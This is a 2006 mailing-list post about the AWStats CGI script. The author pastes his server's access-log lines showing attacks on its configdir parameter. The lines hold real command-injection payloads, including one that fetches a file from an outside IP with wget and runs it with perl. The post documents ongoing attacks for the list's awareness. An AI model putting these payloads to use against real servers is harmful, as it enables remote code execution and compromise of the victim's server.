awstats

Jonathan Stowe jns at gellyfish.com
Wed Mar 8 09:27:10 GMT 2006


On Wed, 2006-03-08 at 08:45, Jonathan McKeown wrote:
> A 10Kline CGI script, with most variables global and including its own CGI 
> parameter parsing. 

I'd say it has a widely known an exploitable flaw:

access.log:64.49.219.174 - - [08/Mar/2005:15:51:21 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20http://64.51.188.10/images/sess_3539283e27d73cae29fe2b80f9293f57;perl%20sess_3539283e27d73cae29fe2b80f9293f57;pwd;echo%20;echo| HTTP/1.1" 404 313
access.log:64.49.219.174 - - [08/Mar/2005:15:51:22 +0000] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20http://64.51.188.10/images/sess_3539283e27d73cae29fe2b80f9293f57;perl%20sess_3539283e27d73cae29fe2b80f9293f57;pwd;echo%20;echo| HTTP/1.1" 404 313
access.log:66.154.95.160 - - [15/Mar/2005:15:50:42 +0000] "GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 322
access.log:66.154.95.160 - - [15/Mar/2005:15:50:42 +0000] "GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 314
access.log:66.154.95.160 - - [15/Mar/2005:15:50:42 +0000] "GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 310
access.log:66.154.95.160 - - [15/Mar/2005:15:50:42 +0000] "GET //cp/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 317
access.log:66.154.95.160 - - [15/Mar/2005:15:50:43 +0000] "GET //stat-cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 315
access.log:66.154.95.160 - - [15/Mar/2005:15:50:43 +0000] "GET //awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 314

It's still going on.

/J\
-- 

This e-mail is sponsored by http://www.integration-house.com/



More information about the london.pm mailing list